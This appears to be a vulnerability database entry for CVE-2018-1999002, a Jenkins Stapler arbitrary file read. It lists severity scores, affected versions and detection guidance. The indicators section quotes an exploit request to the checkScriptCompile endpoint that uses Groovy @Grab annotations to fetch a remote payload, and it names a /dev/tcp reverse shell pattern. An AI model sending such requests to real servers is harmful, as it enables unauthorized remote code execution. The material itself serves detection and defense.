cbcvebase.
CVE-2018-1999002
published 2018-07-23

CVE-2018-1999002: A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java…

PriorityP275high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
86.64%
99.7th percentile
A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.

Affected

7 ranges
VendorProductVersion rangeFixed in
jenkinsfiles_indicating_when_a_plugin
jenkinsjenkins<= 2.121.1
jenkinsjenkins2.122 – 2.132
jenkinsjenkins_core
jenkinsjenkins_lts
jenkinsjenkins_weekly
oraclecommunications_cloud_native_core_automated_test_suite

Detection & IOCsextracted from sources · hover to see the quote

url/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27{:s}%27,%20root=%27http://{:s}%27)%0a@Grab(group=%27package%27,%20module=%27{:s}%27,%20version=%271%27)%0aimport%20Payload;
path/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
path/securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
path/securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
cookieJSESSIONID.wetw0rk!
  • Detect unauthenticated or authenticated HTTP GET requests to the Jenkins Stapler framework containing path traversal patterns targeting arbitrary files on the Jenkins master filesystem.
  • Alert on HTTP GET requests to /securityRealm/user/*/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile containing @GrabConfig, @GrabResolver, and @Grab annotations in the value parameter — this is the chained CVE-2019-1003000 + CVE-2018-1999002 pre-auth RCE trigger.
  • Alert on HTTP GET requests to /securityRealm/user/*/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript with sandbox=true and a value parameter containing .execute() — indicative of sandbox bypass exploitation.
  • Monitor Jenkins master process for outbound DNS or HTTP connections to unexpected external hosts immediately following requests to the checkScriptCompile or checkScript endpoints — indicates successful SSRF/RCE via Groovy @Grab.
  • Detect creation of META-INF/services/org.codehaus.groovy.plugins.Runners on disk, which is a key artifact of the exploit's malicious JAR payload staging.
  • Monitor for Jenkins processes spawning /bin/bash -c with a reverse shell payload (bash -i >& /dev/tcp/...) as a child process, indicating successful RCE.
  • ·The exploit targets a specific combination of vulnerable plugin versions. Confirm the environment has Script Security <=1.49, Pipeline: Declarative <=1.3.4, and Pipeline: Groovy <=2.61 before treating detections as confirmed exploitation.
  • ·CVE-2018-1999002 (arbitrary file read) affects Jenkins <=2.132 and <=2.121.1 LTS. Red Hat OpenShift Enterprise 3 was assessed as Not Affected — tune detections accordingly for containerized/OCP deployments.
  • ·The chained pre-auth RCE requires CVE-2018-1999002 (file read) combined with CVE-2019-1003000 (sandbox bypass). Detections for the file-read path alone may not indicate full RCE; look for the combination of both endpoint accesses.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.